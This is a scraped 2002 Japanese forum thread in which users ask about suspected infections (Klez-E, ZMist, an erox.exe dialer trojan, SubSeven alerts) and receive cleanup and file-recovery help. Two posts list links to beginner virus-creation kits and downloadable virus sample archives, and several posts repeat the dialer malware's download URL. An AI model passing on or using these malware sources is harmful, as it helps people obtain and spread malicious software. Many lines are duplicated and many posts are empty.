メール自体は空のHTMLメールで、123KBくらいあったと思います。
このメールは結局ウイルスではない、ということでよいのでしょうか?
ウイルスに関する知識が乏しいものでちょっと不安になってしまい質
問させて頂きました。
に思って件名を検索したらW32/Klez-Eがそのような件名のメールを
送ることがあることが分かりました。
しかし、それ以前にこのメールには添付ファイルがついていませんで
した。
オンラインスキャンかけてもウイルスは見つからなかったので感染等
の問題はないのだとは思いますが、あまりにも謎なので…。
メール自体は空のHTMLメールで、123KBくらいあったと思います。
このメールは結局ウイルスではない、ということでよいのでしょうか?
ウイルスに関する知識が乏しいものでちょっと不安になってしまい質
問させて頂きました。
527 :名無しさん@お腹いっぱい。:02/03/04 05:32
最近
editor-○○○@eros.stoen.net
みたいなメールがやたら来るんだけど・・・・どうすればいいかな?
editor-○○○@eros.stoen.net
みたいなメールがやたら来るんだけど・・・・どうすればいいかな?
528 :名無しさん@お腹いっぱい。:02/03/04 06:33
>>527
削除
削除
529 :427:02/03/04 09:41
530 :名無しさん@お腹いっぱい。:02/03/04 12:28
531 :editor-○○○@eros.stoen.net :02/03/04 15:23
532 : :02/03/04 15:58
533 :名無しさん@お腹いっぱい。:02/03/04 16:20
すいません、さっき>28のページを開いてしまったのですが
何か起こっちゃいますか?>29で通報してあるとありましたが
もう大丈夫でしょうか?
何か起こっちゃいますか?>29で通報してあるとありましたが
もう大丈夫でしょうか?
534 :名無しさん@お腹いっぱい。:02/03/04 16:31
嘘を嘘と見抜けないひとは(以下略
535 :名無しさん@お腹いっぱい。:02/03/04 16:33
>>533
無くなってるから関係ないよ
無くなってるから関係ないよ
536 :名無しさん@お腹いっぱい。:02/03/04 18:01
>>535
ありがとう、安心しました。
ありがとう、安心しました。
537 :名無しさん@お腹いっぱい。:02/03/04 22:58
538 :名無しさん@お腹いっぱい。:02/03/05 04:06
WIN32 ZMIST ってみなさん見たことありますか?
今日スキャンしたらひっかかたんですけど。
今日スキャンしたらひっかかたんですけど。
539 :名無しさん@お腹いっぱい。:02/03/05 23:14
235 age
540 :名無しさん@お腹いっぱい。:02/03/05 23:16
>>539
誤爆
誤爆
ttp://skyscraper.fortunecity.com/laser/928/virusdownload.shtml
ttp://tokyo.cool.ne.jp/blackhat
ここのウイルスはじめてみたんですけど。
カジノとかストーンとか、面白いですね。
あとピカチュウウイルスと2ちゃんねるウイルスを探しているんですが、
誰かご存知の方いますか?
どんな効果があるのか、ワームなのか詳しく教えてください。
ttp://tokyo.cool.ne.jp/blackhat
ここのウイルスはじめてみたんですけど。
カジノとかストーンとか、面白いですね。
あとピカチュウウイルスと2ちゃんねるウイルスを探しているんですが、
誰かご存知の方いますか?
どんな効果があるのか、ワームなのか詳しく教えてください。
542 :cheshire-cat:02/03/06 00:31
543 :名無しさん@お腹いっぱい。:02/03/06 01:56
きゃーって女の人がさけぶやつを、どこかでふんじゃいました。
いまさらながら・・だれか治し方をおしえてください。
いまさらながら・・だれか治し方をおしえてください。
544 :名無しさん@お腹いっぱい。:02/03/06 02:00
いまさらと言うならば過去ログ漁れ
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
http://www.ebcvg.com/binary.php
未知のウイルス
Bloodhound.HybridCOM
http://www.ebcvg.com/sections/binary/Quest.495.zip
Bloodhound
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
Norton AntiVirusには、Bloodhoundというヒューリスティックアルゴリズムを使用して、
様々なタイプの未知のウイルスを検出する機能があります。
この機能はSymantec Security Responseにより開発されました。
Bloodhoundについての詳細は、
ホワイトペーパーUnderstanding Heuristics: Symantec's Bloodhound Technology
を参照してください。
http://www.symantec.com/avcenter/reference/heuristc.pdf
http://vx.netlux.org/dat/vct.shtml
http://www.ebcvg.com/binary.php
未知のウイルス
Bloodhound.HybridCOM
http://www.ebcvg.com/sections/binary/Quest.495.zip
Bloodhound
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
Norton AntiVirusには、Bloodhoundというヒューリスティックアルゴリズムを使用して、
様々なタイプの未知のウイルスを検出する機能があります。
この機能はSymantec Security Responseにより開発されました。
Bloodhoundについての詳細は、
ホワイトペーパーUnderstanding Heuristics: Symantec's Bloodhound Technology
を参照してください。
http://www.symantec.com/avcenter/reference/heuristc.pdf
546 : :02/03/06 04:33
Re: ヌ、倏キB
こういう件名でメールが来たけど、これってやばい?
ちなみに添付つき。
こういう件名でメールが来たけど、これってやばい?
ちなみに添付つき。
547 :名無しさん@お腹いっぱい。:02/03/06 06:40
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
http://skyscraper.fortunecity.com/laser/928/virusdownload.shtml
未知のウイルス
VirusPack
http://skyscraper.fortunecity.com/laser/928/uirs_pak.lzh
Bloodhound.DirActCOM,File.String,HybridCOM
Bloodhound.HybridCOM
http://www.ebcvg.com/sections/binary/Quest.495.zip
Bloodhound
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
Norton AntiVirusには、Bloodhoundというヒューリスティックアルゴリズムを使用して、
様々なタイプの未知のウイルスを検出する機能があります。
この機能はSymantec Security Responseにより開発されました。
Bloodhoundについての詳細は、
ホワイトペーパーUnderstanding Heuristics: Symantec's Bloodhound Technology
を参照してください。
http://www.symantec.com/avcenter/reference/heuristc.pdf
http://vx.netlux.org/dat/vct.shtml
http://skyscraper.fortunecity.com/laser/928/virusdownload.shtml
未知のウイルス
VirusPack
http://skyscraper.fortunecity.com/laser/928/uirs_pak.lzh
Bloodhound.DirActCOM,File.String,HybridCOM
Bloodhound.HybridCOM
http://www.ebcvg.com/sections/binary/Quest.495.zip
Bloodhound
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
Norton AntiVirusには、Bloodhoundというヒューリスティックアルゴリズムを使用して、
様々なタイプの未知のウイルスを検出する機能があります。
この機能はSymantec Security Responseにより開発されました。
Bloodhoundについての詳細は、
ホワイトペーパーUnderstanding Heuristics: Symantec's Bloodhound Technology
を参照してください。
http://www.symantec.com/avcenter/reference/heuristc.pdf
549 :Worm/Klez-E』が3月6日に発症:02/03/06 12:53
「『Worm/Klez-E』が3月6日に発症」とアンチウイルス・ベンダー各社が警告
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20020306/4/
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20020306/4/
550 :IE6のクッキーについて:02/03/06 14:17
IE6 を入れた人から、私が管理しているあるサーバが
クッキー書き込みエラーとなり次のページに進めない
との連絡を受けるようになりました。
その方のクッキー情報書き込みの制限を解除して貰っても
書き込みエラーが出るようで困ってしまっています。
同様の現象をお持ちの方いらっしゃいませんか?
クッキー書き込みエラーとなり次のページに進めない
との連絡を受けるようになりました。
その方のクッキー情報書き込みの制限を解除して貰っても
書き込みエラーが出るようで困ってしまっています。
同様の現象をお持ちの方いらっしゃいませんか?
551 :名無しさん@お腹いっぱい。:02/03/06 14:21
l
552 :名無しさん@お腹いっぱい。:02/03/06 14:22
スマソ、間違えた
553 :名無しさん@お腹いっぱい。:02/03/06 14:26
>>550 それってどこがウィルスなの?小一時間…以下略
555 :cheshire-cat:02/03/06 18:23
556 :554:02/03/06 18:43
>>555
多分それじゃないかと思います。
なんか
www.media-0.com/www/mild/bakuhatsu.html
を最後まで進んでいくとダウンロードする画面までいくんですが、
そこでダウンロードしたらウイルスめいたものが来て困っています。
ウイルスかどうか猛者に鑑定して欲しいです。
多分それじゃないかと思います。
なんか
www.media-0.com/www/mild/bakuhatsu.html
を最後まで進んでいくとダウンロードする画面までいくんですが、
そこでダウンロードしたらウイルスめいたものが来て困っています。
ウイルスかどうか猛者に鑑定して欲しいです。
557 :cheshire-cat:02/03/06 18:53
558 :名無しさん@お腹いっぱい。:02/03/06 19:43
VIRUS(VIRII)の定義が悪質なプログラミングだとしたら
間違いなく
www.media-0.com/www/mild/bakuhatsu.html
の先にあるものはウイルスといえる。
間違いなく
www.media-0.com/www/mild/bakuhatsu.html
の先にあるものはウイルスといえる。
559 :名無しさん@お腹いっぱい。:02/03/06 20:17
560 :名無しさん@お腹いっぱい。:02/03/06 20:25
_(半角アンダーバー)のみのフォルダができたんですけど
これってウイルスですか?けしても
しばらくするとまた出てきます。
これってウイルスですか?けしても
しばらくするとまた出てきます。
561 :556 559:02/03/06 23:34
さらにもっと詳しく書けば
http://64.71.32.81/ERODIGITAL/erox.exe
です。
erox.exeというのがいかにもって感じで怪しいです。
誰か我こそはって方調査おながいします。
http://64.71.32.81/ERODIGITAL/erox.exe
です。
erox.exeというのがいかにもって感じで怪しいです。
誰か我こそはって方調査おながいします。
562 :名無しさん@お腹いっぱい。:02/03/06 23:37
>>556
ダイアルアップ先を国際通話に書き換える。
胴元は ttp://www.dtiserv.com/jp/index.html 見るならJSとActiveXはきっとけ。
こういう悪質な会社にも証明書を発行するVeriSign Commercial Software Publishers CA
なんて信用したくないという奴は
インターネットオプション→コンテンツ→証明書の信頼されたルート証明機関
からVeriSign Commercial Software Publishers CAを探し
表示→詳細設定→拡張キー使用法→プロパティの編集
でコード署名のチェックをはずしてしまえ。
www.erokichi.com/18over/ax.html?0 で証明書に問題ありが出れば成功。
ダイアルアップ先を国際通話に書き換える。
胴元は ttp://www.dtiserv.com/jp/index.html 見るならJSとActiveXはきっとけ。
こういう悪質な会社にも証明書を発行するVeriSign Commercial Software Publishers CA
なんて信用したくないという奴は
インターネットオプション→コンテンツ→証明書の信頼されたルート証明機関
からVeriSign Commercial Software Publishers CAを探し
表示→詳細設定→拡張キー使用法→プロパティの編集
でコード署名のチェックをはずしてしまえ。
www.erokichi.com/18over/ax.html?0 で証明書に問題ありが出れば成功。
563 :名無しさん@お腹いっぱい。:02/03/06 23:53
564 :556:02/03/06 23:54
565 :cheshire-cat:02/03/06 23:55
>>562
密かにメモします。
密かにメモします。
566 :名無しさん@お腹いっぱい。:02/03/07 08:23
JS_APPACTXCOMP.A
と言うウィルスに感染しました。
自分の探し方が悪いのかもしれませんが、
上記のウィルス、データベースに無いみたいなんです。
どのようなウィルスか判る方いらっしゃらないですか?
(XP IE6 ウィルスバスター2002)
と言うウィルスに感染しました。
自分の探し方が悪いのかもしれませんが、
上記のウィルス、データベースに無いみたいなんです。
どのようなウィルスか判る方いらっしゃらないですか?
(XP IE6 ウィルスバスター2002)
567 :566:02/03/07 08:34
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=JS_APPACTXCOMP.A
トレンドマイクロ(英語サイト)で情報見つかりました。すんまそん。
英語が全く駄目なので、エキサイトで翻訳したのですが、
わかったのは、危険度・破壊力は低く、ActivXがどーのこーの・・・・
ってことだけでした(;´Д`)
ゴチャゴチャ書きましたが、とっとと削除しちゃっても構わないのでしょうか?
また、その後にやるべき事はあるのでしょうか?重ね重ねおながいします。
トレンドマイクロ(英語サイト)で情報見つかりました。すんまそん。
英語が全く駄目なので、エキサイトで翻訳したのですが、
わかったのは、危険度・破壊力は低く、ActivXがどーのこーの・・・・
ってことだけでした(;´Д`)
ゴチャゴチャ書きましたが、とっとと削除しちゃっても構わないのでしょうか?
また、その後にやるべき事はあるのでしょうか?重ね重ねおながいします。
568 :名無しさん@お腹いっぱい。:02/03/07 09:15
>>567 以下に詳細が日本語で書かれている。ウィルス名が違うのは会社によって呼び方が違うから。
http://www.symantec.com/region/jp/sarcj/data/j/js.exception.exploit.html
http://www.nai.com/japan/virusinfo/virU.asp?v=Unsafe%20JS
http://www.symantec.com/region/jp/sarcj/data/j/js.exception.exploit.html
http://www.nai.com/japan/virusinfo/virU.asp?v=Unsafe%20JS
569 :名無しさん@お腹いっぱい。:02/03/07 09:24
>>568 違ってるかもしれない・・・
>>569さん
リンク先を読んでウィルスを削除してから
スタートページとお気に入りとメール送受信でチェックしましたが
異常は見つかりませんでした。
と、手放しで喜んでるのもアレなんで
自分でももう少し調べてみようと思います。
ありがとうございます、ほんとに助かりました。
リンク先を読んでウィルスを削除してから
スタートページとお気に入りとメール送受信でチェックしましたが
異常は見つかりませんでした。
と、手放しで喜んでるのもアレなんで
自分でももう少し調べてみようと思います。
ありがとうございます、ほんとに助かりました。
571 :名無しさん@お腹いっぱい。:02/03/07 09:49
>>570 念のためウィルスチェックはやっといてね。
572 :名無しさん@お腹いっぱい。:02/03/07 12:26
573 :名無しさん@お腹いっぱい。:02/03/07 13:03
>>572 何がだめなんだい? オジさんでよかったら話してごらん。
574 :572:02/03/07 13:33
http://64.71.32.81/ERODIGITAL/erox.exe
をインストールしたまま気づかなくて長時間時間2ちゃんばかりやってた。
をインストールしたまま気づかなくて長時間時間2ちゃんばかりやってた。
575 :名無しさん@お腹いっぱい。:02/03/07 13:56
576 :名無しさん@お腹いっぱい。:02/03/07 14:20
>>574 ダイヤルQ2か国際電話に接続を切り替えるやつね。かわいそうに。
http://pc.2ch.net/test/read.cgi/isp/1010717649/312-350 にも被害者いるね。
http://pc.2ch.net/test/read.cgi/isp/1010717649/312-350 にも被害者いるね。
578 :名無しさん@お腹いっぱい。:02/03/07 14:48
>>577 このあたりに対策があります。こうしている今も国際電話につながってるかも。
http://www.aa.wakwak.com/~dalk/q2log10.html
人様に迷惑はかけてないと思うよ。何万も請求が来るだけ。
http://www.aa.wakwak.com/~dalk/q2log10.html
人様に迷惑はかけてないと思うよ。何万も請求が来るだけ。
579 :578:02/03/07 15:09
>>578
ご親切にどうもありがとうございました。
わたしはAirH"でNO!国際電話をインストールしていたんですが。
EROXソフト自体トロイのようなもので、そこから個人情報が漏れるということは
考えられますか?
ご親切にどうもありがとうございました。
わたしはAirH"でNO!国際電話をインストールしていたんですが。
EROXソフト自体トロイのようなもので、そこから個人情報が漏れるということは
考えられますか?
先ほどLOVELETTERに掛かったファイルを落としてしまい、
そのファイルが削除出来ないのでNortonAntiVirusで検疫
したのですがこの後はどうすればいいのでしょう?
というか検疫ってどういった物なのでしょう?
そのファイルが削除出来ないのでNortonAntiVirusで検疫
したのですがこの後はどうすればいいのでしょう?
というか検疫ってどういった物なのでしょう?
581 :名無しさん@お腹いっぱい。:02/03/07 16:36
>>579 全く皆無ではないが漏れてはいないでしょう。
ダイヤルアップの項目が書き換えられているので戻すことを忘れずに。
Dailsoftとかbobonetがあれば削除。
その状態では国際電話に掛かってないと思われ。
>>580 NAVの「レポート」の「検疫項目」で「レポートを表示」で該当ファイルを
選択して削除する。「検疫」とは隔離みたいなもの。検疫場所に入ったファイル
(つまり検疫項目) はシステムの残りと相互作用しないので、感染ファイルであっ
てもウィルスは伝染しません。
ダイヤルアップの項目が書き換えられているので戻すことを忘れずに。
Dailsoftとかbobonetがあれば削除。
その状態では国際電話に掛かってないと思われ。
>>580 NAVの「レポート」の「検疫項目」で「レポートを表示」で該当ファイルを
選択して削除する。「検疫」とは隔離みたいなもの。検疫場所に入ったファイル
(つまり検疫項目) はシステムの残りと相互作用しないので、感染ファイルであっ
てもウィルスは伝染しません。
583 :579:02/03/07 17:23
584 :名無しさん@お腹いっぱい。:02/03/07 18:50
さっきからノートンで警告が出まくりなんですが
Default Block Backdoor/SubSeven Trojan
とかいうのが出てくるんですが、これはどういうものなんでしょう?
また、どこから攻撃されてるのかわかるものなんですかね?
Default Block Backdoor/SubSeven Trojan
とかいうのが出てくるんですが、これはどういうものなんでしょう?
また、どこから攻撃されてるのかわかるものなんですかね?
585 :名無しさん@お腹いっぱい。:02/03/07 20:40
>584
ノートンスレの1を見てこい。
ノートンスレの1を見てこい。
586 :cheshire-cat:02/03/07 21:25
>>584
コピペ
http://pc.2ch.net/test/read.cgi/hack/1014456049/497
http://pc.2ch.net/test/read.cgi/hack/1014456049/546
コピペ
http://pc.2ch.net/test/read.cgi/hack/1014456049/497
http://pc.2ch.net/test/read.cgi/hack/1014456049/546
587 :名無しさん@お腹いっぱい。:02/03/07 22:05
ステルスUDPポート(2603)をC:\.....moonb.exeから遮断しました。
と言う警告をノートンが出したんですけど、平気なんでしょうか?
と言う警告をノートンが出したんですけど、平気なんでしょうか?
588 :cheshire-cat:02/03/07 22:17
589 :名無しさん@お腹いっぱい。:02/03/07 22:40
すみません質問させてください。
51 を変換しようとしたら ヲタ、
いたって を変換しようとしたら ヨガって
等になりました。
何者かに侵入され、辞書機能いじられてますか?
51 を変換しようとしたら ヲタ、
いたって を変換しようとしたら ヨガって
等になりました。
何者かに侵入され、辞書機能いじられてますか?
590 :cheshire-cat:02/03/07 22:48
>>589
ATOKかIMEか知らないけど、絶対ユーザー辞書いじられているかと。
ネット経由じゃなくて、知人が直接登録してやった悪戯かも。
漏れも、「きむら→本村」とか登録されて、かなり長い間気付かなかったことがある。
ATOKかIMEか知らないけど、絶対ユーザー辞書いじられているかと。
ネット経由じゃなくて、知人が直接登録してやった悪戯かも。
漏れも、「きむら→本村」とか登録されて、かなり長い間気付かなかったことがある。
591 :名無しさん@お腹いっぱい。:02/03/07 22:51
592 :名無しさん@お腹いっぱい。:02/03/07 22:52
593 :cheshire-cat:02/03/07 22:56
594 :590:02/03/07 23:01
すみません。当方、XPのFW入れてたのにあっさり入られたようなので。
も一つ質問です。ATOKって何ですか?検索したら別の(赤い箱のソフト)
ヤツばっか出てくるんですが・・・。
も一つ質問です。ATOKって何ですか?検索したら別の(赤い箱のソフト)
ヤツばっか出てくるんですが・・・。
595 :名無しさん@お腹いっぱい。:02/03/07 23:03
596 :cheshire-cat:02/03/07 23:04
597 :590:02/03/07 23:06
>>596
ありがとうございました。
ありがとうございました。
598 :ところで:02/03/07 23:30
6日を過ぎましたが、KlezE発症した人いますか?
うちは職場に5通来ました。
うちは職場に5通来ました。
599 :cheshire-cat:02/03/07 23:38
600 :なるほど:02/03/08 00:14
検出名が同じでもさらに変種の可能性があるんですね。
じゃあ、うちに来たのも次の6日までファイルの書き換えは大丈夫なんて
たかをくくってはいられないですね。
なかなか周知の難しい職場なんで
時間かせぎだけが唯一の望みだったんだけど。
じゃあ、うちに来たのも次の6日までファイルの書き換えは大丈夫なんて
たかをくくってはいられないですね。
なかなか周知の難しい職場なんで
時間かせぎだけが唯一の望みだったんだけど。
601 :さっきびっくりしたひと。:02/03/08 03:04
今、丁度ヘンなメールが着たんで、訊きたいんですけど・・・
添付つきで、送信者が、自分のメアドの@マーク前の部分と同じで、そのあとに、「-I」って
書いてあるんです。
で、件名欄には、「Re 」だけ。
ココロあたりないし、怖いから、削除したら、ウイルス削除したときとおんなじ反応があったんです。
これってば・・・やっぱりウイルスですか?
添付つきで、送信者が、自分のメアドの@マーク前の部分と同じで、そのあとに、「-I」って
書いてあるんです。
で、件名欄には、「Re 」だけ。
ココロあたりないし、怖いから、削除したら、ウイルス削除したときとおんなじ反応があったんです。
これってば・・・やっぱりウイルスですか?
602 :名無しさん@お腹いっぱい。:02/03/08 03:29
今パソコンの電源をつけて、
アウトルックエキスプレスを起動して、
メールを受信し始めたら、
モニターの電源が切れました。
ウイルスなのでしょうか?
(今はモニターの電源はついてます。)
アウトルックエキスプレスを起動して、
メールを受信し始めたら、
モニターの電源が切れました。
ウイルスなのでしょうか?
(今はモニターの電源はついてます。)
603 : :02/03/08 05:17
604 :名無しさん@お腹いっぱい。:02/03/08 05:49
>>603
ハァ?
ハァ?
605 :名無しさん@お腹いっぱい。:02/03/08 07:36
>>その最後の台詞 ウイルスチェックしろよ
ダサいよあんた。
ダサいよあんた。
時刻,受信/送信,プロトコル,送信元IPアドレス,送信元ポート,送信先IPアドレス,送信先ポート,説明
07:14:06,受信 ,TCP ,61.203.200.61,2010 ,192.168.1.2 ,80 ,Nimda
a. [IPネットワークアドレス] 61.203.200.0
b. [ネットワーク名] UN-AN
f. [組織名] 有限会社アンクルアンティーク
g. [Organization] Un-cle An-tique LTD.
m. [運用責任者] MY1520JP
n. [技術連絡担当者] MB002JP
p. [ネームサーバ] dns.un-an.gr.jp
p. [ネームサーバ] dns1.ile-tec.co.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/05/30
[返却年月日]
[最終更新] 2001/06/14 10:08:17 (JST)
[email protected]
この上のメアドにメールしてもいいんですか?
それとも、放置が基本なのですか?
07:14:06,受信 ,TCP ,61.203.200.61,2010 ,192.168.1.2 ,80 ,Nimda
a. [IPネットワークアドレス] 61.203.200.0
b. [ネットワーク名] UN-AN
f. [組織名] 有限会社アンクルアンティーク
g. [Organization] Un-cle An-tique LTD.
m. [運用責任者] MY1520JP
n. [技術連絡担当者] MB002JP
p. [ネームサーバ] dns.un-an.gr.jp
p. [ネームサーバ] dns1.ile-tec.co.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/05/30
[返却年月日]
[最終更新] 2001/06/14 10:08:17 (JST)
[email protected]
この上のメアドにメールしてもいいんですか?
それとも、放置が基本なのですか?
607 : :02/03/08 09:10
608 :名無しさん@お腹いっぱい。:02/03/08 11:21
PE_MAGISTR.A(B/OVR/DAM)
って言うウィルス名を聞いたんですが、誰かご存知のかたいらっしゃいますか?
検索かけても見つからなくて。
って言うウィルス名を聞いたんですが、誰かご存知のかたいらっしゃいますか?
検索かけても見つからなくて。
609 :名無しさん@お腹いっぱい。:02/03/08 11:33
610 :名無しさん@お腹いっぱい。:02/03/08 23:13
2ちゃんねらーの力で子供達を救おうよ(連日連夜 祭り開催中!)
何処の板から来たかを明記してくれると、みんなのやる気が上がります!
【クリック】 押してみっかな【クリック】http://live.2ch.net/test/read.cgi/festival/1015502074/l50
これを見て少しでも協力する気になった人
この文を色々な板にコピペしてくれると助かります
何処の板から来たかを明記してくれると、みんなのやる気が上がります!
【クリック】 押してみっかな【クリック】http://live.2ch.net/test/read.cgi/festival/1015502074/l50
これを見て少しでも協力する気になった人
この文を色々な板にコピペしてくれると助かります
611 :名無しさん@お腹いっぱい。:02/03/08 23:36
数時間前から困っています。
送られてくるメールほとんどに添付ファイルがあるのです。
友人の携帯のメールからメーリングリストまで、
ほとんんどのメールについています。
RE●●とか空白のタイトルではないのでどのようなウィルスなのか
わかりません。
心あたりがある方、ぜひおしえてください。
既出でしたらすみません。
よろしくお願いいたします。
送られてくるメールほとんどに添付ファイルがあるのです。
友人の携帯のメールからメーリングリストまで、
ほとんんどのメールについています。
RE●●とか空白のタイトルではないのでどのようなウィルスなのか
わかりません。
心あたりがある方、ぜひおしえてください。
既出でしたらすみません。
よろしくお願いいたします。
612 :名無しさん@お腹いっぱい。:02/03/09 00:02
KLEZ_Eにかかっとるようなのだが…
今見れないjpgとかmpgもう一回見られるようにするにはどうしたらいいのか…
やっぱアンチウィルス入れるべきなのか…
今見れないjpgとかmpgもう一回見られるようにするにはどうしたらいいのか…
やっぱアンチウィルス入れるべきなのか…
613 :名無しさん@お腹いっぱい。:02/03/09 01:33
http://www.trendmicro.co.jp/vinfo/
‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥○
■ 新 種 ウ イ ル ス 情 報━━━━━━━━━━━━━━━━━
● WORM_GIBE.A(ギベ)
マイクロソフト社のセキュリティアップデートプログラムと偽る
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
○ウイルス名: WORM_GIBE.A
○危険度:低
○対応ウイルスパターンファイル:235 以降 ※1
○ウイルス活動:
メールの添付ファイルで広まります。メールの内容は次のとおりです。
‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥○
■ 新 種 ウ イ ル ス 情 報━━━━━━━━━━━━━━━━━
● WORM_GIBE.A(ギベ)
マイクロソフト社のセキュリティアップデートプログラムと偽る
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
○ウイルス名: WORM_GIBE.A
○危険度:低
○対応ウイルスパターンファイル:235 以降 ※1
○ウイルス活動:
メールの添付ファイルで広まります。メールの内容は次のとおりです。
614 :名無しさん@お腹いっぱい。:02/03/09 06:33
>>やっぱアンチウィルス入れるべきなのか…
あたりまえ
あたりまえ
1週間ほど前「このメールを削除したらHDDをフォーマットする」
みたいな英文のメールがきた。(添付ファイル無し)
ウザイんで当然削除。
そして今日、WIN2000はお亡くなりに為りました。
(ノートンのautoprotectはかけてありましたが、無反応でした。)
一体何のウィルスだったのか情報希望
みたいな英文のメールがきた。(添付ファイル無し)
ウザイんで当然削除。
そして今日、WIN2000はお亡くなりに為りました。
(ノートンのautoprotectはかけてありましたが、無反応でした。)
一体何のウィルスだったのか情報希望
616 :名無しさん@お腹いっぱい。:02/03/09 13:31
>>615
頼むからネタだと言ってクレ
頼むからネタだと言ってクレ
>>616
イヤ、マジだから聞いてるんよ
イヤ、マジだから聞いてるんよ
618 :名無しさん@お腹いっぱい。:02/03/09 13:41
そのメールとは無関係だったことにしようYO
620 :名無しさん@お腹いっぱい。:02/03/09 14:08
>>615 そのメールはHTMLだったのか?
622 :助けて:02/03/09 15:47
パソコンがKLEZ.Eってウイルスが感染されました。ソフトを利用して
ウイルスを駆除しましたが、.xls と.jpgの拡張子を付いているファイルを
全部壊されました。EXCLEのファイルに大事なデータが入っていますので
回復できるかどうか、回復できるならその方法も教えて頂けませんか。
ウイルスを駆除しましたが、.xls と.jpgの拡張子を付いているファイルを
全部壊されました。EXCLEのファイルに大事なデータが入っていますので
回復できるかどうか、回復できるならその方法も教えて頂けませんか。
623 :cheshire-cat:02/03/09 15:56
>>622
こういう事?
>拡張子が.txt、.htm、.html、.wab、.doc、.xls、.jpg、.cpp、.c、.pas、.mpg、.mpeg、.bak、.mp3のファイルを0で埋め尽くす
エクセルってツール→アドイン→自動保存を利用していると、編集中にテンポラルファイルみたいなのを作ってくれるよね。
Final Dataとか使ってさ、それをサルベージするとか。
こういう事?
>拡張子が.txt、.htm、.html、.wab、.doc、.xls、.jpg、.cpp、.c、.pas、.mpg、.mpeg、.bak、.mp3のファイルを0で埋め尽くす
エクセルってツール→アドイン→自動保存を利用していると、編集中にテンポラルファイルみたいなのを作ってくれるよね。
Final Dataとか使ってさ、それをサルベージするとか。
624 :助けて:02/03/09 16:11
Final Dataがなんですか、EXCELに対して初心者ですのでもうちょっと
詳しい説明を書いて頂けませんか。
詳しい説明を書いて頂けませんか。
625 :cheshire-cat:02/03/09 16:35
詳しい?
1)自動保存を有効にしていたならば
デスクトップにエクセルのファイルを一つ置いて、それを開いて編集。
その時、半透明のファイルが出来る?全てのファイルを表示にしていると。
自動バックアップファイルなんだけど。エクセルを終了すると、勝手に消える。
これをデータ復旧ソフトのFinal Dataで拾う。
回収したファイルの拡張子を、xlsに変更。
2)FDやMOにそのファイルを移動させた事があるなら
もう削除していたとしても、そのメディアから、同様にFinal Dataで復旧できるかも。
クイックフォーマットしていても、回収できたりする。
「通常のフォーマット」だとまずいけど。
3)編集のため、一旦別の名前のコピーを作っていて、それを編集後に削除した経験があるなら。
Final Dataで拾う。
FinalDataとかは、削除してしまったファイルの復旧ツールです。
1-3に該当しないなら、上書き系なのであきらめるしかないかと。
FinalData
http://www.finaldata.ne.jp/
1)自動保存を有効にしていたならば
デスクトップにエクセルのファイルを一つ置いて、それを開いて編集。
その時、半透明のファイルが出来る?全てのファイルを表示にしていると。
自動バックアップファイルなんだけど。エクセルを終了すると、勝手に消える。
これをデータ復旧ソフトのFinal Dataで拾う。
回収したファイルの拡張子を、xlsに変更。
2)FDやMOにそのファイルを移動させた事があるなら
もう削除していたとしても、そのメディアから、同様にFinal Dataで復旧できるかも。
クイックフォーマットしていても、回収できたりする。
「通常のフォーマット」だとまずいけど。
3)編集のため、一旦別の名前のコピーを作っていて、それを編集後に削除した経験があるなら。
Final Dataで拾う。
FinalDataとかは、削除してしまったファイルの復旧ツールです。
1-3に該当しないなら、上書き系なのであきらめるしかないかと。
FinalData
http://www.finaldata.ne.jp/
626 :cheshire-cat:02/03/09 16:42
つまり削除済みのファイルは、ファイルの位置とかの情報は消えるけど、ファイルのデータそのものが残っている事がある。
そういう状態のファイルまでは、KLEZに上書きされないかと。
それをサルベージするという話。
飲み会行ってくるんで、あとは自己解決してくださいな。
それでも駄目だと言うなら、お値段は高いけど。
http://www.nifty.com/eclinic/
そういう状態のファイルまでは、KLEZに上書きされないかと。
それをサルベージするという話。
飲み会行ってくるんで、あとは自己解決してくださいな。
それでも駄目だと言うなら、お値段は高いけど。
http://www.nifty.com/eclinic/
627 :別スレ351 ◆enghYAOw :02/03/09 21:19
どもチシャ猫さん。先日はお世話になりました。
今の段階ではあれから特に変わったことはありません。
まだウィルスが潜んでることは確かなのですが…
え〜っと、KLEZ_Eに感染して見れなくなった画像とか動画ファイルは>>622の言ってる
「壊された」って表現が正しいんですか?
てことは、感染する前に保存しておいたファイルはもう使えないってことですよね?
使えないなら削除するだけなんですが…
一応OSインストールしなおしてからDLしたファイルは見れるようになりました。
メールで質問すればよかったんですが、すいません。
今の段階ではあれから特に変わったことはありません。
まだウィルスが潜んでることは確かなのですが…
え〜っと、KLEZ_Eに感染して見れなくなった画像とか動画ファイルは>>622の言ってる
「壊された」って表現が正しいんですか?
てことは、感染する前に保存しておいたファイルはもう使えないってことですよね?
使えないなら削除するだけなんですが…
一応OSインストールしなおしてからDLしたファイルは見れるようになりました。
メールで質問すればよかったんですが、すいません。
628 :名無しさん@お腹いっぱい。:02/03/09 21:27
現在謎のウイルスを確認。
アンチドートスーパーライトでスキャンしたらWin32.ZMistというものを検出。
ウイルスバスターでは検出できず。
http://www.symantec.co.jp/region/jp/sarcj/cgi-bin/virauto.cgi?vid=10598によると
.exeファイルに感染しているらしいのに、C:\Program Files\Fudeoh50\BIN\addrdic\PMLTDB32.DLLに感染の報告がされてる。
誤検出でいいのかな・・・・・・
アンチドートスーパーライトでスキャンしたらWin32.ZMistというものを検出。
ウイルスバスターでは検出できず。
http://www.symantec.co.jp/region/jp/sarcj/cgi-bin/virauto.cgi?vid=10598によると
.exeファイルに感染しているらしいのに、C:\Program Files\Fudeoh50\BIN\addrdic\PMLTDB32.DLLに感染の報告がされてる。
